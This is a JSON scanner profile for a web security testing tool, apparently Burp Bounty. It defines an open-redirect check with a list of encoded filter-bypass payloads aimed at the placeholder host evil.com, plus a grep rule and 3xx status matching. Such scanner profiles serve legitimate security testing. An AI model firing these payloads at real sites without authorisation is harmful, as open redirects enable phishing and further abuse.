[{"Name":"Example_OpenRedirect",
"Active":true,
"Scanner":1,
"Author":"@egarme",
"Payloads":["%2F%09%2Fevil.com",
"%2F%10%2Fevil.com",
"%2F%13%2Fevil.com",
"evil.com",
"/evil.com",
"//evil.com",
"///evil.com",
"////evil.com",
"/\\evil.com",
"%2fevil.com",
"%2f$2fevil.com",
"%2fevil.com%2f%2f",
"$2f%2fevil.com%2f%2f",
"%2fevil.com//",
"http://example.com%0a%23.evil.com"],
"Encoder":[" "],
"UrlEncode":false,
"CharsToUrlEncode":"",
"Grep":["location.*evil.com"],
"PayloadResponse":false,
"NotResponse":false,
"NotCookie":false,
"TimeOut":0,
"isTime":false,
"CaseSensitive":false,
"isReplace":false,
"Replace1":"",
"Replace2":"",
"ExcludeHTTP":false,
"OnlyHTTP":false,
"IsContentType":false,
"ContentType":"",
"NegativeCT":false,
"IsResponseCode":true,
"ResponseCode":"300,
  301,
  302,
  303,
  304,
  305,
  306,
  307,
  308",
"NegativeRC":false,
"MatchType":2,
"RedirType":4,
"MaxRedir":9,
"rCookies":false,
"spaceEncode":false,
"payloadPosition":1,
"sEncode":"",
"payloadsFile":"",
"grepsFile":"",
"IssueName":"OpenRedirect",
"IssueSeverity":"High",
"IssueConfidence":"Certain",
"IssueDetail":"Open Redirect with payload: \u003cgrep\u003e",
"RemediationDetail":"",
"IssueBackground":"",
"RemediationBackground":""}]